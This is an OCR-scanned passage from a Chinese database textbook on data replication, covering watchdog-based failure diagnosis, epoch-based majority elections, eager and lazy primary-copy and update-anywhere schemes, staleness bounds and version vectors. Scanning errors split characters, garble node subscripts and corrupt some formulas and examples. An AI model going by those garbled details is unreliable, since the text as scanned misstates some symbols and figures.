通信 和 链 路 是 否 断 了 。 当 只 有 一 个 主 结 点 和 一 个 辅 结 点 时 ， 看 门 狗 能 负 此 责任 。 为 简化 讨论 ， 
我 们 先 考 虑 单 主 单 辅 结 点 的 结构 出 故障 的 情形 ， 而 后 再 考虑 多 辅 结 点 的 情形 。 





图 26-10 采用 固定 交互 和 投票 的 积极 主 备份 


看 门 狗 〈 watchdog) 为 了 确切 地 诊断 两 结 点 环境 中 的 故障 ， 需 要 第 三 者 介入 ， 从 而 得 到 
多 数 意见 。 考虑 这 样 的 情形 ， 结 点 S, ( 主 ) 认为 结 点 S; ( 辅 ) 宕 机 了 , 而 结 点 S; 却 认为 正好 
相反 , 那么 陷入 了 僵局 。 需 要 一 个 多 数 意见 才能 确定 到 底 是 谁 出 了 问题 ， 因 此 需要 第 三 方 ， 
称 之 为 看 门 狗 。 一 方面 ， 看 门 狗 是 系统 中 一 个 新 的 单 点 失效 ， 它 既 不 应 该 运行 在 主 结 点 上 ， 
也 不 应 该 在 辅 结 点 上 ; 另 一 方面 ， 为 正确 诊断 故障 类 型 又 需要 看 门 狗 。 为 补救 单 点 失效 问 
题 ， 看 门 狗 本 身 又 被 元 余 镜像 。 
看 门 狗 按照 图 26-11 所 示 的 四 种 情况 检查 (注意 ， 所 有 决定 都 需 人 介入 ， 因 为 在 此 考虑 
的 是 仅 两 结 点 构成 的 系统 ): 
e 如 果 看 门 狗 仅 能 与 主 结 点 通信 ， 它 告知 主 结 点 这 个 情况 ， 主 结 点 则 试图 联系 辅 结 点 。 
如 果 联 系 成 功 ， 无 须 决 定 什 么 ， 否 则 应 该 创建 一 个 新 的 辅 结 点 。 
e 如 果 看 门 狗 与 两 个 结 点 都 能 通信 ， 但 它 俩 谁 也 不 能 联系 到 对 方 ， 说 明 通 信和 链 路 断 了 。 
那么 最 后 决定 是 释放 掉 这 个 辅 结 点 ， 通 


知 主 结 点 再 创建 一 个 新 的 辅 结 点 。 

如 果 看 门 狗 能 到 达 辅 结 点 但 联 不 上 主 

结 点 ， 情 形变 得 更 复杂 。 看 门 狗 告知 畏 

结 点 这 个 情况 ， 如 果 辅 结 点 能 联系 上 主 

结 点 ， 也 无 须 决定 什么 。 若 联系 不 上 ， Wi i 
辅 结 点 只 得 假设 主 结 点 宕 掉 了 ， 让 自己 

变 为 主 结 点 。 这 要 冒 一 定 风险 ， 因 为 主 @ 
结 点 可 能 只 是 太 忙 无 暇 回答 而 已 。 为 了 
避免 存在 两 个 主 结 点 ， 看 门 狗 则 给 原来 @ 二 
的 主 结 点 喂 颗 毒药 〈 poison pill)。 情况 4 

如 果 在 看 门 狗 、 主 结 点 和 辅 结 点 之 

间 两 两 都 不 能 通信 ， 那 可 能 出 现 全 局 


故障 w = 看 门 狗 p = 主 结 点 s = 辅 结 点 
一 能 通信 ”人 链 路 可 能 断 了 ”一 一 链 路 断 了 
铺 结 点 恢复 (secondary site recovery) 图 26-11 看 门 狗 的 情况 (基于 Bemstein 和 


如 果 辅 结 点 宕 了 ， 主 结 点 应 该 继续 处 理 请 Newcomer, 2009 ) 
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求 并 将 处 理 结 果 写 信永 久 存储 ， 直 至 辅 结 点 恢复 过 来 。 辅 结 点 的 恢复 过 程 等 同 于 从 恢复 日 志 
恢复 。 不 同 的 是 ， 主 结 点 一 旦 依次 提交 了 各 更 新 ， 辅 结 点 即 能 在 本 地 应 用 它们 ， 但 辅 结 点 不 
得 不 再 次 联系 主 结 点 ， 以 获得 在 这 期 间 处 理 过 的 更 新 。 进 而 ， 为 了 免除 辅 结 点 不 断 地 询问 更 
新 情况 ， 主 结 点 积极 把 所 有 更 新 推送 给 辅 结 点 。 
主 结 点 恢复 (primary site recovery) 

主 结 点 的 恢复 更 为 复杂 。 遇 到 主 结 点 故障 ， 系 统 只 能 停止 一 切 更 新 。 这 似乎 过 于 严厉 ， 
若 大 部 分 事务 均 为 只 读 事务 ， 这 可 能 是 个 合适 的 决定 。 如 果 感 到 这 个 方法 太 严 ， 则 不 得 不 由 
所 有 副本 选举 出 一 个 新 主 结 点 。 选 举 必须 是 确定 无 二 意 的 ， 否 则 对 某 个 数据 集 若 存 在 多 个 主 
结 点 势必 导致 不 一 致 性 。 此 时 更 新 若 能 在 多 个 结 点 执行 ， 主 备份 就 会 出 现 分 歧 。 一 旦 新 的 主 
结 点 选 出 来 ， 所 有 挂 起 的 操作 都 在 新 的 主 备份 上 执行 。 

下 面 讨 论 更 为 实际 的 情形 ， 即 存在 多 个 辅 备份 的 情形 。 
多 数 同意 与 法 定数 同意 (majority and quorum consensus)( 多 个 备份 ) 

现实 中 一 般 有 多 个 副本 ， 那 么 看 门 狗 变 为 多 余 之 物 ， 因 为 至 少 有 两 个 结 点 可 参与 判 
定 另 一 结 点 是 好 是 坏 。 没 了 看 门 狗 ， 辅 结 点 须 能 诊断 到 主 结 点 故障 ， 例 如 通过 送 心跳 
( heartbeat) 信息 的 办 法 。 遗 憾 的 是 ， 如 果 主 结 点 宕 机 同时 网 络 被 分 区 则 会 出 现 问 题 ， 因 为 
每 个 分 区 可 能 独立 地 推举 某 个 辅 结 点 为 主 结 点 ， 或 保留 它 原 有 的 主 结 点 。 很 明显 ， 若 后 来 
网 络 不 再 分 区 (这 极 有 可 能 发 生 )， 不 期 望 的 情形 将 出 现 。 如 果 两 个 分 区 各 有 一 个 主 结 点 ， 
修改 将 在 这 两 个 主 结 点 上 处 理 且 各 自 为 政 。 结 果 可 能 造成 两 个 分 区 处 于 不 可 逆转 的 不 一 致 
状态 。 解 决 此 问题 的 办 法 是 仅 允 许多 数 个 辅 结 点 一 起 选举 新 的 主 结 点 ， 因 为 多 数 一 定 会 有 
重合。 必须 知道 结 点 的 总 数 ， 因 为 该 协议 只 有 当 结 点 个 数 为 奇数 且 大 于 2 时 才 有 效 。 为 克 
服 这 些 缺 点 可 引入 法 定数 ( quorums) 的 概念 ， 此 时 ， 每 个 副本 加 权 ， 所 谓 多 数 是 通过 加 
权 求 和 来 确定 。 权 可 根据 不 同 参数 赋予 ， 例 如 ， 可 依据 数据 库 的 大 小 或 网 络 的 可 靠 性 等 因 
素 。 然 而 无 论 是 按照 多 数 还 是 按照 法 定数 ， 达 成 一 致 的 机 制 是 相同 的 ， 因 此 下 面 仅 考虑 多 
数 同意 机 制 。 | 

为 了 达成 统一 ， 重 要 的 是 一 个 分 区 中 的 所 有 辅 结 点 需 判 断 一 致 。 这 当 多 数 个 结 点 同时 
检测 到 主 结 点 故障 而 分 别 启动 选举 过 程 时 会 成 问题 。 而 且 在 选举 过 程 中 ， 通 信 链 路 可 能 不 
稳定 ， 或 者 又 有 结 点 发 生 故 障 ; 如 果 网 络 非常 不 稳定 ， 不 大 可 能 产生 出 决策 ， 此 时 有 必要 
等 待 网 络 稳定 后 再 进行 。 该 协议 使 用 的 标识 符 来 自 全 序 集 。 每 个 标识 符 〈 称 为 纪元 号 epoch 
number) 关联 一 个 纪元 ， 标 识 一 个 时 间 段 。 每 个 结 点 都 须 把 当前 纪元 号 保存 在 稳固 存储 中 。 
最 终 参 与 了 多 数 同意 意见 的 结 点 构成 的 集合 称 为 纪元 集合 。 规 则 是 与 唯一 的 最 高 纪元 号 意见 
一 致 者 赢 。 协 议 有 如 下 步骤 : 

第 一 步 : Si 发 现 它 的 主 结 点 故障 ， 故 发 起 选举 。Si 产生 一 个 比 原 纪元 号 Ei 大 的 新 纪元 
号 E:。 新 纪元 号 只 需 在 Ei 中 除 $1 结 点 标识 符 以 外 的 部 分 加 1。 在 纪元 号 中 含 结 点 标识 符 的 
目的 是 为 别 的 结 点 判定 该 纪元 号 最 初 是 在 哪个 结 点 产生 的 。 

第 二 步 : Si 发 出 一 个 含 E 的 邀请 给 分 区 中 其 他 结 点 ， 视 自己 为 选举 领袖 。 

第 三 步 : 当 S; 接受 到 该 邀请 ， 它 : 

若 尚未 接受 到 任何 大 于 E, 纪元 号 的 邀请 ， 则 回答 同意 ， 并 附 上 它 自 己 当前 的 纪元 号 。 

若 已 经 参与 到 一 个 小 于 E; 纪元 号 的 选举 ， 则 立即 停止 那个 活动 。 

若 已 接受 到 大 于 E, 纪元 号 的 邀请 ， 则 回答 消息 拒绝 $; 的 邀请 ， 并 在 拒绝 消息 上 附 上 已 
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收 到 的 那个 更 大 的 纪元 号 ， 以 告知 S; 它 能 看 见 的 那个 纪元 号 。 

第 四 步 : 如 果 Si 至 少 收 到 比 多 数 少 一 个 结 点 发 回 的 同意 消息 ， 它 就 达成 了 多 数 同意 (加 
它 自己 一 票 ) 。 一 条 含 新 纪元 号 以 及 所 有 同意 结 点 列表 (新 纪元 集合 ) 的 新 纪元 消息 发 给 所 
有 同意 结 点 。S; 选举 结束 。 

第 五 步 : 一 个 结 点 一 旦 接收 到 新 的 纪元 消息 ， 立 即 更 新 纪元 号 ， 把 新 纪元 号 连同 新 纪元 
集合 一 起 写 人 稳固 存储 。 

如 果 在 一 定时 间 内 Si 不 能 达成 多 数 一 致 ， 选 举 超时 并 停止。 

如 果 仅 有 一 个 领袖 ( S! )， 那 么 它 要 不 获得 足够 多 的 同意 消息 ， 要 不 超时 。 选 举 若 不 成 
功 ，Si 等 待 一 段 时 间 后 重启 选举 。 等 待 一 段 时 间 很 重要 ， 一 来 可 给 网 络 一 些 时 间 恢 复 通 信 故 
障 ， 二 来 可 免除 领导 选举 的 结 点 们 不 断 尝 试 ， 试 图 获得 多 数 票 而 带 来 死 锁 。 等 待 期 间 Si 如 
果 没 有 接 到 邀请 加 入 更 大 纪元 号 的 纪元 集合 ， 它 就 会 启动 新 一 轮 选举 。 如 果 该 领袖 在 等 待 后 
决定 重新 选举 , 接受 到 的 任何 一 个 拒绝 消息 中 的 纪元 号 都 能 用 于 产生 新 的 更 大 的 纪元 号 ， 使 
得 其 他 结 点 相信 接收 到 的 不 是 旧 邀 请 ， 因 为 纪元 号 已 比 前 次 发 起 选举 时 的 纪元 号 更 大 了 。 最 
终 ， 如 果 建立 了 一 个 新 的 纪元 集合 ， 则 从 中 选 出 新 的 主 备份 。 这 个 协议 的 细节 作为 练习 留 给 
读者 考虑 ， 在 此 仅 提 供 下 列 信息 : 

多 数 会 有 重合 ， 因 此 老 纪元 集合 中 的 成 员 至 少 会 有 一 个 在 新 纪元 集合 中 。 

如 果 这 个 公共 成 员 就 是 原来 的 主 备 份 ， 它 可 能 还 是 过 时 了 。 

如 果 新 纪元 不 含 旧 纪元 的 领袖 ， 主 备份 的 选举 可 以 依据 某 些 因素 ， 例 如 考虑 其 磁盘 可 用 
空间 的 大 小 ， 或 该 结 点 更 接近 一 致 状态 等 。 

由 于 所 有 的 更 新 都 须 在 主 备份 进 行 ， 主 备份 很 容易 变 为 瓶颈 。 此 外 ， 等 待 投票 结果 也 
降低 响应 时 间 。 对 不 同 的 段 用 不 同 的 主 备 份 可 能 有 帮助 ， 但 又 不 得 不 考虑 这 样 将 增加 的 协调 
开销 。 进 而 ， 在 网 络 故 障 时 选举 新 主 备份 昂贵 且 费 时 。 线 性 交互 的 好 处 是 ， 主 结 点 最 后 结束 
事务 时 ， 所 做 更 新 已 经 可 用 了 。 这 虽然 使 得 在 辅 结 点 能 较 早 发 现 读 写 冲 突 ， 但 还 是 增加 了 消 
息 开 销 。 而 且 ， 正 如 26.3.3 节 所 述 ， 用 写 集合 通常 好 于 再 执行 SQL 语句 。 从 恢复 的 角度 看 ， 
线性 交互 的 好 处 不 明显 。 在 主 结 点 故障 而 投票 选举 开始 之 前 的 一 段 时 间 里 ， 辅 结 点 只 能 使 用 
已 提交 更 新 。 使 用 状态 (提交 或 撤销 ) 不 明 的 更 新 会 引起 不 一 致 。 因 此 ， 线 性 交互 与 用 很 少 
消息 时 的 结果 几乎 一 样 。 

采用 积极 更 新 传播 时 ， 响 应 时 间 总 是 依赖 最 慢 的 结 点 。 而 且 ， 为 保证 原子 性 而 增加 的 投 
票 在 故障 情况 下 会 阻塞 事务 。 长 时 间 读 事务 也 能 阻塞 更 新 事务 ， 它 会 增加 更 新 事务 的 响应 时 
间 。 在 辅 结 点 出 现 冲 突 时 ， 撤 销 读 事务 可 能 合理 一 些 ， 因 为 撤销 更 新 事务 会 造成 更 多 浪费 且 
要 回 退 所 有 结 点 。 只 读 事 务 的 撤销 能 在 局 部 处 理 。 一 种 更 好 的 办 法 是 在 辅 结 点 用 快照 隔离 ， 
这 样 使 得 读 操作 从 不 与 写 操作 冲突 ， 后 面 再 讨论 。 

不 论 采 用 怎样 的 交互 方式 ， 这 种 模式 都 禁止 主 结 点 在 所 有 辅 结 点 提交 完 之 前 提交 任 
何事 务 ， 从 而 保证 了 原子 性 和 会 话 一 致 性 。 如 果 主 结 点 避免 了 写 写 和 读 写 冲突 ， 而 辅 结 
点 不 会 有 读 写 冲 突 ， 该 模式 产生 1CSR 调度 。 为 了 维持 事务 在 每 个 辅 结 点 的 执行 顺序 ， 
依据 事务 在 主 结 点 的 提交 顺序 ， 消 息 以 FIFO (先进 先 出 ) 顺序 广播 。 为 了 维持 这 个 顺序 ， 
主 结 点 仅 能 当前 一 投票 阶段 结束 后 才能 初始 化 下 一 个 新 投票 阶段 。 对 单个 事务 ， 采 用 线性 
交互 的 消息 开销 为 (n-1)*(m+2) (m 次 更 新 *n-1 个 远程 结 点 ，n-1 条 准备 ，n-1 条 投票 )， 
采用 固定 交互 的 消息 开销 为 3n-3(n-1 个 远程 结 点 ，m-1 条 准备 ，n-1 条 投票 )。 这 种 模式 
的 缺点 是 : 
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如 果 更 新 事务 增加 ， 主 结 点 可 能 很 快 变 为 瓶颈 。 

主 结 点 恢复 昂贵 。 

事务 不 得 不 显 式 标记 为 只 读 ， 这 与 复制 透明 性 冲突 。 
响应 时 间 依 赖 于 最 慢 的 结 点 。 

故障 情况 下 投票 会 造成 阻塞 。 

。 长 时 间 只 读 事务 可 能 阻塞 更 新 事务 。 

而 这 种 模式 的 优点 是 : 

。 投票 保证 n- 安全 的 后 备 结 点 。 

。 辅 备份 从 不 会 过 时 。 

。 产生 1CSR 调度 且 本 模式 是 会 话 一 致 的 。 


26.3.2 ”懒惰 主 备份 


懒惰 传播 的 目标 是 提高 主 备份 的 性 能 ， 人 允许 它 单方 面 决定 是 否 提 交 或 撤销 事务 ， 也 就 
是 说 这 个 结 点 无 须 等 待 辅 结 点 。 由 于 更 新 传播 不 在 事务 范畴 内 ， 响 应 时 间 肯 定 比 积极 传播 短 
(网 络 延 迟 越 大 ， 这 个 效果 越 明 显 )。 为 了 维持 事务 的 执行 顺序 ， 采 用 FIFO 消息 传送 。 主 结 
点 能 选择 一 个 一 个 地 传播 更 新 ， 如 图 26-12a 所 示 ; 也 可 传播 整个 写 集 合 ， 如 图 26-12b 所 示 。 
进而 ， 投 票 过 程 保 证 了 这 些 更 新 在 所 有 结 点 原子 地 完成 ， 并 简化 为 单个 确认 消息 ， 如 下 面 的 
讨论 。 





a) 线性 交互 b) 固定 交互 
图 26-12 ”懒惰 主 备份 采用 


恢复 
正 像 讨论 前 一 模式 一 样 ， 主 备份 的 存在 要 求 合适 的 恢复 机 制 。 然 而 ， 懒 惰 复 制 的 一 条 主 
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要 缺点 可 能 就 是 : 当主 结 点 故障 时 ， 所 有 尚未 作用 到 辅 结 点 上 的 更 新 都 将 丢失 。 解 决 该 问题 
的 一 种 办 法 是 引入 一 个 或 多 个 服务 器 专门 后 援 主 备份 ， 采 用 积极 更 新 方式 更 新 它们 ， 外 加 一 
个 投票 阶段 。 这 是 对 辅 结 点 懒惰 传播 与 对 专门 后 援 结 点 积极 传播 的 一 种 权衡 。 在 网 络 分 区 的 
情况 下 ， 纪 元 集合 必须 选举 出 新 的 主 结 点 和 它 的 专用 后 援 结 点 。 

限制 陈旧 性 (bounding staleness) 

由 于 懒惰 传播 ， 辅 结 点 提供 过 时 数据 。 按 照 固定 的 进度 传播 和 主 备份 一 旦 提交 立即 开始 
传播 是 两 种 常用 方法 ， 通 过 更 新 传播 时 间 可 控制 陈旧 性 。 前 一 种 方法 对 于 同步 各 分 公司 的 运 
营 数据 较 合 适 ， 后 一 种 方法 保证 最 小 的 不 一 致 性 。 然 而 ， 两 种 方法 都 相当 固定 ， 未 更 精细 地 
考虑 应 用 的 特殊 需求 。 例 如 ， 某 些 数据 不 应 该 晚 于 某 个 时 刻 ， 某 些 数据 不 应 该 异 于 主 备份 超 
过 某 个 时 段 。 总 结 起 来 ， 有 三 类 重要 的 限制 : 

e 限时 陈旧 型 (time-bound staleness)。 辅 结 点 上 某 个 数据 项 至 多 允许 在 t 时 间 单 位 内 
为 过 时 的 。 主 结 点 维持 这 个 数据 项 最 近 一 次 更 新 的 时 间 ， 一 旦 立 值 达到 ， 立 即 传播 
该 更 新 。 限 时 陈旧 型 可 用 于 所 有 数据 类 型 。 

限 值 陈旧 型 (value-bound staleness)。 辅 结 点 上 某 个 数据 项 与 主 结 点 的 值 差 不 能 超过 
某 个 闵 值 。 在 此 ， 由 主 结 点 维持 这 个 数据 项 在 主 辅 结 点 间 的 值 差 。 每 一 更 新 操作 后 ， 
主 结 点 都 检查 该 阀 值 。 如 果 达 到 阔 值 ， 此 更 新 连同 主 结 点 上 尚未 传播 的 所 有 更 新 全 
部 传播 出 去 。 为 了 保持 这 种 陈旧 型 ， 立 值 检 查 总 是 在 更 新 写 入 主 备份 并 可 用 于 传播 
之 前 进行 。 例 如 ， 假 设 数据 项 x 在 各 结 点 的 值 为 100， 人 允许 的 值 差 阐 值 为 10。 此 时 ， 
若 Ti 将 值 108 写 人 x， 值 差 现 为 8， 仍 小 于 净值 。 假 设 T; 继续 将 值 112 写 入 x， 注 
意 值 差 达到 12， 此 时 将 Ti 和 T 所 做 更 新 〈 即 值 112 ) 一 并 传播 ， 但 这 违反 了 辅 结 
点 上 基于 值 的 陈旧 型 约束 。 为 避免 这 种 情形 ， 主 结 点 不 得 不 先 传播 值 108 , 并 设置 值 
差 ， 最 后 再 写 入 112 作为 x 的 新 值 。 限 值 陈旧 型 仅 可 用 于 数值 型 数据 。 

限 更 新 陈旧 型 (update-bound staleness)。 辅 结 点 错过 的 更 新 次 数 限 定 在 某 个 阔 值 
内 。 例 如 ， 如 果 对 数据 项 x 这 个 浆 值 是 1， 则 意味 着 每 次 更 新 都 必须 立即 传播 。 若 
阔 值 为 2， 则 每 两 次 更 新 后 不 得 不 传播 。 同 样 ， 限 更 新 陈旧 型 可 用 于 所 有 数据 类 
型 。 注 意 ， 限 更 新 陈旧 型 为 更 一 般 的 情况 ， 限 时 和 限 值 陈旧 型 都 可 映射 到 允许 的 更 
新 次 数 上 。 

不 同 的 结 点 采用 不 同 的 限制 也 是 可 能 的 。 此 时 ， 主 结 点 要 将 不 同 的 限制 与 结 点 标示 符 联 
系 起 来 。 进 而 ， 也 可 能 采用 基于 推 (push) 和 拉 (pull) 的 方法 ， 感 兴趣 的 读者 参见 Kemme 
等 (2010 ) 获得 更 多 细节 。 限 制 是 针对 数据 项 定义 而 不 是 针对 事务 ， 更 新 传播 的 效果 应 该 
考虑 。 

传播 ”为 了 帮助 理解 传播 ， 我 们 从 例子 人 手 。 事 务 Ti 修改 数据 项 x 和 y,x 与 y 有 
不 同 的 限制 。 因 此 , x 的 更 新 在 b 时 刻 传播 ， 而 y 的 更 新 在 时刻 传播 (ti)。 在 时 刻 
bt<b<tb)， 读 事务 T, 读 了 x 和 y， 那 么 T, 看 见 了 x 更 新 后 的 值 ， 而 看 不 见 y 的 ,这 
不 是 可 串 行 执行 。 解决 此 问题 的 一 种 办 法 是 ， 事 务 更 新 数据 项 中 只 要 有 一 个 的 阅 值 达 
到 ， 就 要 求 主 结 点 传播 该 事务 已 做 所 有 更 新 。 例 如 ， 事 务 Ti 更 新 了 x 和 z(x 一 z) (箭头 表 
示 序 ， 意 即 x 在 z 之 前 执行 ), T; 更 新 了 y 和 z (yz)。 在 y 的 阅 值 被 T; 违 反 的 情形 下 ， 
y(T2) 一 Zz(Ts) 一 z(T1) 一 x(T1) 都 不 得 不 传播 。 这 种 级 联 行为 会 导致 几乎 所 有 的 更 新 都 会 立即 传 
播 ， 阅 值 带 来 的 好 处 变 得 几乎 可 以 忽略 。 而 且 还 不 得 不 维护 事务 操作 的 序 。 因 此 ， 或 者 找到 
一 种 机 制 控制 级 联 行为 ， 或 者 另辟蹊径 。Kemme 等 ( 2010 ) 描述 了 一 种 机 制 ， 不 过 是 针对 
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写 集合 传播 ， 而 不 是 针对 操作 传播 。 其 思想 是 在 限时 陈旧 型 的 情况 ， 用 最 近 时 间 惟 (at-the- 
latest timestamp) 标记 写 集合 。 对 于 限 值 陈旧 型 和 限 修改 陈旧 型 ， 该 方法 也 能 工作 。 这 种 方 
法 只 能 用 于 带 写 集合 抽取 的 固定 交互 的 情形 。 

通常 ， 我 们 期 望 主 结 点 上 的 事务 在 其 尚未 与 辅 结 点 进行 交互 之 前 就 终止 ， 这 样 主 结 点 上 
的 操作 就 不 必 一 执行 完 就 立即 广播 。 其 实 ， 分 离 地 广播 更 新 这 件 事 并 不 影响 响应 时 间 ， 因 为 
该 任务 能 方便 地 用 后 台 线 程 来 实现 。 而 这 样 做 的 好 处 是 ， 到 主 结 点 决定 结束 事务 那 一 刻 ， 辅 
结 点 上 所 有 操作 都 能 用 了 。 在 下 列 环境 中 这 样 做 是 有 益 的 : 

e 需要 短 的 响应 时 间 。 

e 主 结 点 提交 与 辅 结 点 上 安装 好 所 有 操作 结果 的 间隔 必须 很 短 。 

e 消息 的 数目 对 性 能 没有 太 大 影响 。 

特别 对 于 那些 写 集 合 抽取 十 分 昂贵 的 大 事务 ， 这 是 非常 有 价值 的 策略 。 

从 恢复 的 角度 看 ， 线 性 的 更 新 传播 没有 特殊 价值 。 当 主 结 点 故障 那 一 刻 ， 即 使 更 新 在 辅 
结 点 都 可 用 ， 关 键 的 还 是 看 主 结 点 的 最 后 决策 。 而 这 个 决策 又 要 等 到 主 结 点 决定 作用 更 新 的 
那 一 刻 才能 给 出 。 注 意 ， 只 有 那些 提交 过 的 更 新 才能 恢复 。 在 这 个 模式 下 ， 投 票 阶段 变 为 
接受 阶段 。 原 因 是 懒惰 传播 要 求 辅 结 点 接受 主 结 点 所 做 决定 。 如 何人 允许 辅 结 点 拒绝 主 结 点 所 
做 决定 的 话 ， 那 么 主 结 点 已 经 提交 ， 因 辅 结 点 的 拒绝 反 过 来 影响 主 结 点 ， 使 得 在 主 结 点 需要 
回 滚 已 提交 的 事务 ， 这 显然 是 不 可 能 的 。 甚 至 抵消 事务 的 执行 都 可 能 导致 级 联 回 滚 。 因 此 ， 
与 懒惰 更 新 传播 组 合 的 投票 意味 着 让 所 有 辅 结 点 都 统一 到 一 个 状态 ， 保 证 弱 (最 终 ) 一 致 性 。 
如 果 某 个 辅 结 点 不 能 应 用 更 新 ， 一 种 模式 是 切除 该 结 点 ， 撤 销 其 上 活跃 事务 直至 所 有 缺失 的 
更 新 都 被 作用 完 为 止 。 如 此 严格 的 原因 是 使 其 他 辅 结 点 和 主 结 点 免 受 某 一 个 辅 结 点 流产 的 影 
响 ， 还 能 保证 一 致 性 。 注 意 ， 在 懒惰 传播 模式 中 ， 即 使 查询 可 能 总 是 看 到 过 时 的 数据 ， 也 应 
该 保持 所 有 辅 结 点 在 统一 状态 。 不 管 在 哪个 结 点 执行 查询 ， 结 果 都 必须 一 样 (针对 具体 的 应 
用 场景 可 能 放松 这 个 限制 ， 不 过 在 此 不 再 考虑 )。 

依据 数据 项 的 需求 来 控制 辅 结 点 的 陈旧 性 是 个 好 主意 ,但 不 得 不 考虑 级 联 行 为 。 男 一 
个 问题 是 需要 确定 各 数据 项 的 限制 。 而 这 又 要 考虑 到 无 论 用 积极 还 是 懒惰 但 立即 传播 的 可 
能 性 。 

因为 辅 结 点 在 所 有 缺失 更 新 都 被 应 用 之 前 不 能 再 处 理 任何 查询 请 求 这 条 严格 的 约束 ， 
这 种 模式 能 保证 最 终 一 致 性 。 者 不 加 其 他 机 制 ， 无 法 提供 会 话 一 致 性 〈 读 你 所 写 )。 如 果 在 
一 次 会 话 中 ， 某 事务 在 主 结 点 更 新 了 一 个 数据 项 ， 同 一 会 话 的 后 续 事 务 在 辅 结 点 上 想 读 这 
个 更 新 的 数据 项 ， 则 出 现 问题 。 也 就 是 说 ， 不 能 保证 该 更 新 已 经 传播 出 去 。 阻 止 这 种 问题 
的 一 种 办 法 是 把 会 话 与 主 结 点 关联 起 来 ， 只 要 在 主 结 点 执行 过 更 新 ， 后 续 无 论 哪 个 事务 的 
读 ， 只 要 来 自 同一 会 话 均 引 向 主 结 点 。 在 某 种 意义 上 ， 这 是 控制 陈旧 性 的 一 种 措施 。 对 单 
个 事务 ， 采 用 线性 交互 的 消息 开销 估计 为 (n-1)*(m+1) (m 次 更 新 *n-1 个 远程 结 点 ，n-1 
次 同意 )， 采 用 固定 交互 的 消息 开销 则 为 2n-2(n-1 更 新 传播 ，n-1 次 同意 )。 这 种 模式 的 
缺点 是 : 

e 如 果 更 新 事务 数目 增加 ， 主 结 点 可 能 很 快 变 为 瓶颈 。 

e 恢复 昂贵 。 

e 辅 结 点 提供 过 时 的 数据 给 查询 。 

e 事务 不 得 不 显示 标记 为 只 读 ， 这 与 复制 透明 性 冲突 。 

而 这 种 模式 的 优点 是 : 
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。 因 懒 惰 传 播 改 善 了 主 结 点 的 性 能 。 
。 接受 回答 保证 所 有 辅 备份 最 后 处 于 同一 状态 。 
e 用 控制 数据 陈旧 性 的 机 制 控 制 因 人 懒惰 造成 的 不 一 致 性 。 


26.3.3 ”积极 随处 更 新 


本 节 给 出 一 种 ROWA 模式 ， 在 此 由 某 些 结 点 处 理 的 更 新 立即 广播 到 所 有 其 他 结 点 。 更 
新 的 传播 限制 在 本 地 事务 的 范围 内 ， 原 子 性 由 最 后 的 投票 阶段 保证 。 这 种 模式 基于 锁 的 协议 
在 25.2.3 节 已 讨论 。 注 意 我 们 仅 考虑 线性 交互 方式 。 模 式 说 明 见 图 26-13。 














时 间 一 一 > 


图 26-13 采用 线性 交互 和 投票 的 积极 随处 更 新 


恢复 

与 主 备份 模式 比 ， 这 种 模式 的 好 处 是 ， 多 个 主 备份 (每 个 结 点 都 是 主 结 点 ) 简化 了 恢复 ， 
与 投票 结合 的 积极 传播 又 保证 n- 安全 结 点 。 然 而 ， 网 络 分 区 时 也 要 求 多 数 达 成 一 致 。 如 果 
到 一 并 处 理 更 新 时 网 络 仍然 分 区 ， 那 它们 的 状态 就 会 有 偏差 ， 甚 至 当 网 络 修复 后 也 不 可 能 再 
恢复 到 一 致 的 状态 。 与 主 备份 相 比 ， 纪 元 集合 〈 即 多 数 ) 不 必 选 举 新 主 备份 ( 见 26.3.1 节 )。 

能 在 任 一 结 点 更 新 的 灵活 性 也 有 某 些 缺 点 需要 考虑 。 具 体 地 说 ， 为 了 保证 在 每 一 时 间 点 
所 有 结 点 一 致 ， 要 求 大 量 的 通信 开销 。 若 采用 锁 作 为 并 发 控制 协议 ， 已 经 证 明 : 在 一 个 “ 随 
时 =- 随地 -随便 更 新 ”的 系统 中 ， 当 负载 增 大 时 ， 事 务 性 的 复制 会 表现 不 稳定 : 结 点 增加 
10 倍 ， 死 锁 或 调停 将 增加 1000 倍 。 这 个 模式 产生 1CSR 调度 。 单 个 事务 的 消息 开销 估算 为 
(n-1)*(m+2) (m 次 更 新 *n-1 个 远程 结 点 ，n-1 投票 ，n-1 投票 ) 。 该 模式 最 关键 的 优点 是 没 
有 单 点 失效 。 缺 点 则 包括 : 

e 为 保证 所 有 结 点 一 致 所 产生 的 性 能 消耗 ; 

e 2PC 协议 故障 时 产生 阻塞 ; 

e 死 锁 可 能 性 大 。 


26.3.4 ”懒惰 随处 更 新 


在 这 个 ROWA 模式 中 ,更 新 允许 在 任何 结 点 上 进行 , 但 只 会 懒惰 地 传播 到 远程 结 点 。 
当 人 允许 多 个 结 点 修改 复制 数据 并 且 懒 惰 传 播 更 新 时 ， 必 须 有 机 制 检查 更 新 中 的 冲突 并 使 数据 
恢复 一 致 。 问 题 是 ， 由 于 任意 结 点 最 初 都 能 自己 决定 是 提交 还 是 撤销 事务 ， 可 能 出 现 这 样 的 
情况 ， 即 两 个 结 点 有 冲突 ， 但 已 经 提交 了 修改 。 在 懒惰 主 备份 模式 下 ， 可 移 除 掉 没 接受 更 新 
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的 辅 结 点 。 这 儿 却 不 可 能 ,因为 每 个 结 点 都 是 主 结 点 ， 并 且 由 于 懒惰 的 原因 ， 任 意 结 点 可 能 
已 经 在 本 地 提交 ， 但 与 之 冲突 的 事务 还 没 被 传播 到 。 检 查 并 解决 冲突 的 机 制 是 这 个 模式 工作 
的 关键 。 下 面 讨论 一 种 检查 冲突 的 机 制 ， 而 对 冲突 消解 机 制 只 做 个 概述 。 

使 用 版 本 向 量 (version vector) 进行 冲突 检查 

为 检查 冲突 ， 每 个 结 点 为 每 一 数据 项 维持 一 个 版 本 。 版 本 是 个 元 组 ， 由 下 列 内 容 构 成 : 

e 数据 项 最 近 一 次 提交 的 值 。 

e 版 本 ID， 它 是 由 结 点 标识 符 和 当地 版 本 构成 的 元 组 。 

e 版 本 向 量 。 

版 本 向 量 V 表示 一 个 结 点 能 看 见 的 版 本 ， 版 本 向 量 中 第 ;个 位 置 对 应 纳入 x 当前 值 的 
第 i 个 结 点 的 版 本 。 例 如 是 一 个 (2, 1, 1) 版 本 向 量 说 明 结 点 S, 知道 它 自己 的 最 新 版 本 2 和 S， 
与 $3 的 版 本 1， 它 们 都 被 纳入 x 当前 的 值 ， 但 还 没 提交 。x 在 结 点 $1 的 一 个 完整 版 本 可 能 
是 x= (3, (2, 2), (1, 2, 1)), 其 中 3 表示 x 的 最 新 值 ， 它 在 结 点 $: 最 新 版 本 2 中 ，Si 已 知 纳入 
